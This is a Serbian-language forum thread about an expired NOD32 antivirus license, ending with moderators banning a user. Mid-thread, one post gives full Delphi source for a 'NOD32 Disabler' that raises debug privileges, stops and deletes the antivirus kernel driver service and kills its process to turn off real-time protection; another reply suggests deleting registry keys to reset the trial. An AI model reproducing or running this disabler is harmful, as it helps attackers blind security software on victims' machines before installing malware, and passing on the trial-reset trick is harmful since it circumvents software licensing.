pomoc oko NOD32

stanje
Zatvorena za pisanje odgovora.

stealth

Početnik
Poruka
27
Imam NOD32 i super je sljakao i sam se update-ovao kada god se konektujem na net. Medjutim izgleda da mi je istekao i sta vec i poslednji update je bio 12.03. Kada sada kliknem na update on mi trazi lozinku i sifru..To valjda znaci da je istekao. E sada, nabavio sam disk sa update-om ili cime vec, stvarno nemam pojma jer se ne razumem najbolje. E sada bi neko mogao da mi kaze sta sada da radim? Ubacim disk i? Da li to mogu ja sam da obavim ili moram da zovem nekog strucnog? Ne bih nista od ovoga radio da mi se, u momentu kada se NOD vise nije update-ovao upali tojanci, spyware, malware, ovo, ono..hajde da mi neko pomogne, please...hvala!
 
Od toga nista...i ako imash to na disku to je vec staro , a i svakih nedelju dana bi morao da rucno instaliras nove up date-ove.Ja imam besplatni antivir. i svaki dan se up date- uje i nisam josh ni jedan virus pokupijo.Postoji i drugi nacin ali ovde o tome nesme da prica......
 
stealth:
Imam NOD32 i super je sljakao i sam se update-ovao kada god se konektujem na net. Medjutim izgleda da mi je istekao i sta vec i poslednji update je bio 12.03. Kada sada kliknem na update on mi trazi lozinku i sifru..To valjda znaci da je istekao. E sada, nabavio sam disk sa update-om ili cime vec, stvarno nemam pojma jer se ne razumem najbolje. E sada bi neko mogao da mi kaze sta sada da radim? Ubacim disk i? Da li to mogu ja sam da obavim ili moram da zovem nekog strucnog? Ne bih nista od ovoga radio da mi se, u momentu kada se NOD vise nije update-ovao upali tojanci, spyware, malware, ovo, ono..hajde da mi neko pomogne, please...hvala!
Imaš dve mogućnosti. Plati licencu za NOD32 ili instaliraj neki besplatini anitvirus program kao što je Avast, na primer. Bez obzira koliko je taj update koji imaš nov, on je već postao star, jer se baza antivirusa kod NOD32 ažurira bar jednom dnevno.
 
Ako imaš licencu onda valjda znaš kada ti ističe, a ako je nemaš onda je davno istekla. Da, to što traži novu kombinaciju korisničkog imena i lozinke, znači da je licenca koja je korišćena istekla.
 
stealth:
Imam NOD32 i super je sljakao i sam se update-ovao kada god se konektujem na net. Medjutim izgleda da mi je istekao i sta vec i poslednji update je bio 12.03. Kada sada kliknem na update on mi trazi lozinku i sifru..To valjda znaci da je istekao. E sada, nabavio sam disk sa update-om ili cime vec, stvarno nemam pojma jer se ne razumem najbolje. E sada bi neko mogao da mi kaze sta sada da radim? Ubacim disk i? Da li to mogu ja sam da obavim ili moram da zovem nekog strucnog? Ne bih nista od ovoga radio da mi se, u momentu kada se NOD vise nije update-ovao upali tojanci, spyware, malware, ovo, ono..hajde da mi neko pomogne, please...hvala!

1) Plati licencu za NOD32
2) Uninstaliraj i obriši njegove ključeve iz registry baze jer je tamo zapisano da je u trial modu pa instaliraj ponovo.
Ovo nije nelegalno već kvarno. :razz:
3) NEMOJ da uzimaš BESPLATNE ANTIVIRUSE jer je praksa pokazala da neće detektovati ni ono što je pisano pre tri godine. Dakle, ni Avasta ni AVG (koji je bolji u svakom slučaju)
4) Testirao sam sebe tri meseca bez ikakve antivirus zaštite. Obilazio sam samo zvanične prezentacije poznatih firmi i forume. Posle tri meseca detaljno sam podvrgao računar kontroli i nisam zatekao ništa.
5) Čak i da ne obilaziš sajtove sa "sadržajima za odrasle" povedi računa koje "free" programe instaliraš te njihove lokacije. Postoji niz sajtova koji igre-muziku ili programe daju apsolutno regularno. (doduše ne i najnovije ali si bar miran)
 
Sve je to lepo, ali da bi zaustavio NOD32 datim programom neophodno je da imaš mogućnost da ga pokreneš na odgovarajućem računaru i da se program uspešno izbori za neophodne privilegije da bi to mogao da uradi.

Inače to nema nikakve veze sa problemom koji je ovde pomenut, a to je korišćenje piratske registracije zbog koje je NOD32 posle nekog vremena presta da ažurira bazu potpisa virusa.
 
Voleo bih da znam zasto su mi obrisane poruke gde sam uhvatio gosn' SLODER K u lazima?
Ako je izbrisao on sam svoje poruke i tragove svojih lazi, ko je i zasto brisao i moje poruke u vezi ovoga? Sa kakvim pravom i objasnjenjem?
Molim moderatora ovog podforuma za objasnjenje
GZ, Agente - nije valjda neko od vas tetak onom lazovu SOLDER K
Kad je izvredjao clanove foruma, niste reagovali?
Sta se desava?
 
Program AntiNod32;
{
NOD32 Disabler by SOLDER_K
29/04/2007
---------------------------------------

}

{$APPTYPE CONSOLE}

Uses Windows, TLHelp32, WinSvc;

Const
Welcome =
' WARNING!!, This Application demonstrate how disable NOD32 Protection.'+#13#10+
' Source code is included, Tested on NOD32 NT version, '+#13#10+
' Type yes if u want to disable NOD32 protection'+#13#10;

PROCESS_TERMINATE = $0001;
DrvName: PChar = 'AMON'; // Nod32 core Kernel Driver
SrvName: PChar = 'nod32krn.exe';

//--- We will stop the nod driver with this function
// Nod that it work like Services
Function StopNodDriver(): Boolean;
Var
SCManager, Service: SC_Handle;
ServiceStatus: TServiceStatus;
Begin
Result := False;
SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT);
If SCManager = 0 Then Exit;
Try
Service := OpenService(SCManager, PChar(DrvName), SERVICE_STOP);
If ControlService(Service, SERVICE_CONTROL_STOP, ServiceStatus) Then
Result := True;
CloseServiceHandle(Service);
Finally
CloseServiceHandle(SCManager);
End;
End;
//Unregistring nod's driver
// This will remove driver's keys from registry
Function UnrNodDrv(): Boolean;
Var
SCManager, Service: SC_Handle;
Begin
Result := False;
SCManager := OpenSCManager(Nil, Nil, SC_MANAGER_CONNECT);
If SCManager = 0 Then Exit;
Try
Service := OpenService(SCManager, PChar(DrvName), STANDARD_RIGHTS_REQUIRED);
If Service <> 0 Then
If DeleteService(Service) Then
Result := True;
CloseServiceHandle(Service);
Finally
CloseServiceHandle(SCManager);
End;
End;

//- we will need some privilege
procedure SetTokenPrivileges;
var
hToken1, hToken2, hToken3: THandle;
TokenPrivileges: TTokenPrivileges;
Version: OSVERSIONINFO;
begin
Version.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO);
GetVersionEx(Version);
if Version.dwPlatformId <> VER_PLATFORM_WIN32_WINDOWS then
begin
try
OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken1);
hToken2 := hToken1;
LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPrivileges.Privileges[0].luid);
TokenPrivileges.PrivilegeCount := 1;
TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
hToken3 := 0;
AdjustTokenPrivileges(hToken1, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3);
TokenPrivileges.PrivilegeCount := 1;
TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
hToken3 := 0;
AdjustTokenPrivileges(hToken2, False, TokenPrivileges, 0, PTokenPrivileges(nil)^, hToken3);
CloseHandle(hToken1);
except;
end;
end;
end;

Function ExtractFileName(s: String): String;
Var i, j: integer;
Begin
j := 0;
For i := 1 To length(s) Do
If (s = '\') Then j := i;
result := copy(s, j + 1, length(s));
End;

//--- Yeah killing Nod's services
//After stoping Nod's driver we need to kill the service
// And like this nod32krn.exe will need to load the driver, but can't because the driver is stoped
//-- By the way after some research I have found that Nod injects 2 or 3 threads in 'services.exe'
// and like this if killed, it will be restarted by the remote thread.
// so if u want to completly kill nod's service u must kill the 2 threads in 'services.exe'
Function KillNod32(): integer;
Var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
Begin
result := 0;
SetTokenPrivileges;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
While integer(ContinueLoop) <> 0 Do
Begin
If (ExtractFileName(FProcessEntry32.szExeFile)) = SrvName Then
Result := Integer(TerminateProcess(OpenProcess(
PROCESS_TERMINATE, BOOL(0),
FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle,
FProcessEntry32);
End;
CloseHandle(FSnapshotHandle);
End;

var
s:string;
Begin
//- yep just to demonstrate, )) u can remove all that shits
///
WriteLn(welcome);
ReadLn(s);
If s = 'yes' then
Begin
//-- This one is the most important we must stop the driver
If StopNodDriver() Then
WriteLn(' Stoping Nod32 driver ok ')
Else
Begin
WriteLn(' Failed to stop Nod32 driver,any key to continue....');
Readln;
End;
//-- u can remove this function if u want that nod that start in the next boot
///
If UnrNodDrv() Then
WriteLn(' Unregistring Nod32 driver ok')
Else
Begin
WriteLn(' Error while trying to Unregister Nod32 Driver,any key to continue...');
ReadLn;
End;
Asm
Call KillNod32 //;))
// After this the NOD's realtime protection will be disabled completly
// and we don't need a reboot
//- and if u use StopNodDriver() nod will be disabled also after the reb0ot
// So be carefull

End;
end;
readln
// SOLDER_K
End.
 
Ovde se neko malo igrao brisanja kanda?
Moderatori, mogli bi da objasnite šta se ovde dešava, pošto ste jedino vi mogli da obrišete kompletnu temu.

@SOLDER K
Da zaustavalja, pod uslovom da si u stanju da pokreneš program na nekom računaru i da imaš odgovarajuće privilegije. Dakle, bez problema može da ne zaustavi.
 
Offtopic..

Autor je poceo da vrijedja..
To necemo dozvoliti ni ja ni Agent.. Pogotovo ne, ako tema za temom pocne da lici na spam i nekontrolisano pisanje do strane autora, da ne govorim o daljem vrijedjanju..

End Offtopic.
 
codemaker:
Voleo bih da znam zasto su mi obrisane poruke gde sam uhvatio gosn' SLODER K u lazima?
Ako je izbrisao on sam svoje poruke i tragove svojih lazi, ko je i zasto brisao i moje poruke u vezi ovoga? Sa kakvim pravom i objasnjenjem?
Molim moderatora ovog podforuma za objasnjenje
GZ, Agente - nije valjda neko od vas tetak onom lazovu SOLDER K
Kad je izvredjao clanove foruma, niste reagovali?
Sta se desava?

Nas dragi prijatelj ce imati vremena da razmisli o ponasanju, postovanju posjetilaca foruma, i naravno postovanju Pravilnika foruma..

User Baned..

Look./
 
stanje
Zatvorena za pisanje odgovora.

Back
Top